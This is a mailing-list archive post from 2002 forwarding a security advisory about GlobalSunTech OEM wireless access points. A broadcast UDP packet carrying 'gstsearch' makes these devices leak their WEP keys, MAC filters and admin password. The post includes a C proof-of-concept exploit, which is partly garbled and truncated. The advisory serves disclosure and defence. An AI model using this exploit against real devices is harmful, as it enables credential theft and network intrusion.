CRIME Another AP hack.

From: brvarin@private
Date: Wed Nov 06 2002 - 07:31:38 PST

Next message: George Heuston: "CRIME FW: [Cyber_threats] Daily News 11/06/02"

Previous message: Lyle Leavitt: "CRIME [Fwd: [Information_technology] Daily News 11/05/02]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Reason #43567 to not allow wireless in the corporate environment. Send a
UDP packet to the AP and it gives up WEP keys, mac filters, and admin
password. It only affects the best selling AP's!

GlobalSunTech develops Wireless Access Points for OEM customers like
Linksys, D-Link and others. Capturing the traffic of a WISECOM GL2422AP-0T
during the setup phase showed a security problem.

Sending a broadcast packet to UDP port 27155 containing the string
"gstsearch" causes the accesspoint to return wep keys, mac filter and
admin password. This happens on the WLAN Side and on the LAN Side.

Systems Affected
----------------
Vulnerable, tested, OEM Version from GlobalSunTech:
WISECOM GL2422AP-0T

Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
D-Link DWL-900AP+ B1 version 2.1 and 2.2
ALLOY GL-2422AP-S
EUSSO GL2422-AP
LINKSYS WAP11-V2.2


Proof of concept:
-----------------

#include
#include
#include
#include
#include

typedef struct {
char type[28];
char name[32];
char user[16];
char pass[16];
}
__attribute__ ((packed)) answer;

int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);

sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd type);
printf("Announced Name : %sn",ans->name);
printf("Admin Username : %sn",ans->user);
printf("Admin Password : %sn",ans->pass);

return 0;
}

Disclaimer
-----------

This advisory does not claim to be complete or to be usable for
any purpose. Especially information on the vulnerable systems
may
be inaccurate or wrong. Possibly supplied exploit code is not to
be used for malicious purposes, but for educational purposes
only.
This advisory is free for open distribution in unmodified form.

http://www.khamsin.ch

===========================================================================
IMPORTANT NOTICE: This communication, including any attachment, contains
information that may be confidential or privileged, and is intended solely
for the entity or individual to whom it is addressed.  If you are not the
intended recipient, you should delete this message and are hereby notified
that any disclosure, copying, or distribution of this message is strictly
prohibited.  Nothing in this email, including any attachment, is intended
to be a legally binding signature.

Next message: George Heuston: "CRIME FW: [Cyber_threats] Daily News 11/06/02"
Previous message: Lyle Leavitt: "CRIME [Fwd: [Information_technology] Daily News 11/05/02]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Nov 06 2002 - 08:32:07 PST